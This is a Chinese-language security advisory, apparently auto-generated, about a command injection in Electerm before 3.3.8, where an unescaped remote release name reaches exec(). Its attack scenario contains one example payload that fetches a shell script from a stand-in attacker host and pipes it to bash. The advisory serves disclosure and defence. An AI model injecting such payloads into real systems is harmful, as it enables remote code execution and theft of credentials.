📋 漏洞概述

Electerm 3.3.8之前版本存在命令注入漏洞，攻击者可利用未验证的远程releaseInfo.name执行任意命令，导致远程代码执行。

📋 基础信息

🔬 漏洞根因

在npm/install.js第150行的runMac()函数中，程序将远程获取的releaseInfo.name字段直接拼接到exec('open ...')命令中执行，未对特殊字符（如反引号、$()、管道符等）进行过滤或转义，导致攻击者控制的releaseInfo.name可以注入任意操作系统命令。

🎯 攻击场景

1. 攻击者搭建恶意更新服务器，或通过中间人攻击（如DNS劫持）篡改正常更新响应； 2. 用户启动Electerm自动更新或手动触发检查更新，程序请求远程releaseInfo.name； 3. 攻击者返回的releaseInfo.name包含恶意命令负载，例如：`; curl http://attacker.com/shell.sh | bash`； 4. Electerm的runMac()函数将恶意内容拼入exec('open ...')，执行时触发注入； 5. 攻击者获得用户主机的远程代码执行权限，可执行任意命令、安装后门、窃取数据。

💥 漏洞影响

攻击者可在目标主机上以Electerm进程权限执行任意系统命令，实现远程代码执行（RCE），进而完全控制用户终端，窃取SSH密钥、会话凭证、文件等敏感信息，或横向移动至内网其他主机。

🛡️ 修复建议

立即升级至Electerm 3.3.8及以上版本；临时缓解措施：禁用自动更新功能，或通过防火墙/代理阻止Electerm连接不受信任的更新服务器，同时在部署环境中对更新响应的releaseInfo.name进行严格输入校验。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-41500
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41500
• 原始来源（NVD-Latest）

⚠️ 本文由漏洞情报系统自动生成，仅供安全研究与防御参考。生成时间: 2026-05-10 08:07 | 来源: NVD-Latest